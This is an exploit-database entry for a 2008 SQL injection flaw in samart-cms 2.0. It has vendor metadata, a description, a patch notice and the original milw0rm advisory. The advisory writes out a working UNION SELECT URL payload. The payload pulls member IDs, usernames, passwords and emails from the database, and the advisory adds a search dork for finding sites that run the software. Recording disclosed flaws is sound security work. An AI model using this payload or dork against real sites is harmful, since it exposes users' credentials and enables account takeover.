samart-cms 2.0 Remote SQL Injection Vulnerability

vendor:

samart-cms

by:

dun

CVSS

HIGH

SQL Injection

CWE

Product Name: samart-cms

Affected Version From: 2

Affected Version To: 2

Patch Exists: YES

Related CWE: N/A

CPE: a:samart:samart-cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

samart-cms 2.0 Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in samart-cms 2.0. An attacker can send a specially crafted HTTP request containing malicious SQL statements to the vulnerable script, which will then be executed in the back-end database. This can allow the attacker to gain access to sensitive information such as usernames and passwords stored in the database.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the software.

Source

Exploit-DB raw data:

  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ dun[at]strcpy.pl ]

 #################################################################
 #   [ samart-cms 2.0 ]   Remote SQL Injection Vulnerability     #
 #################################################################
 #
 # Script site: http://samart.6x.to/
 # 
 # Vuln: 
 # http://site.com/site.php?contentsid=-1+UNION%20SELECT+1,2,4,3,concat_ws(char(58),m_id,m_username,m_password,m_email),6,7+from+member/*
 #
 # 
 # Dork example: "Powered by samart-cms"
 #
 ###############################################
 # Greetz: D3m0n_DE * sid.psycho * str0ke and otherz..
 ###############################################

 [ dun / 2008 ] 

*******************************************************************************************

# milw0rm.com [2008-06-19]